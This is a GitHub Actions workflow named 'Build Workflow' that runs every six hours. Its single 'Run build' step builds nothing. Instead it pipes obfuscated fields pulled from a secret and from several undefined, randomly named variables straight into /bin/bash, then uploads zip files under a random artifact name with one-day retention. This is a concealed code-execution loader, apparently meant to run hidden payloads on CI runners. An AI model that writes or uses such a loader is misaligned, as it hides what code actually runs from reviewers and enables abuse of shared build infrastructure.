name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '49 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          r91: ${{ secrets.r91 }}
        run: |
          printf '%s' "$r91" | jq -r .tzzj2 | /bin/bash
          printf '%s' "$g0" | jq -r .lld075 | /bin/bash
          printf '%s' "$jadqo551" | jq -r .twvi0946 | /bin/bash
          echo $br05 | jq -r .f0344 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 98XG8IcX
          path: "*.zip"
          retention-days: 1
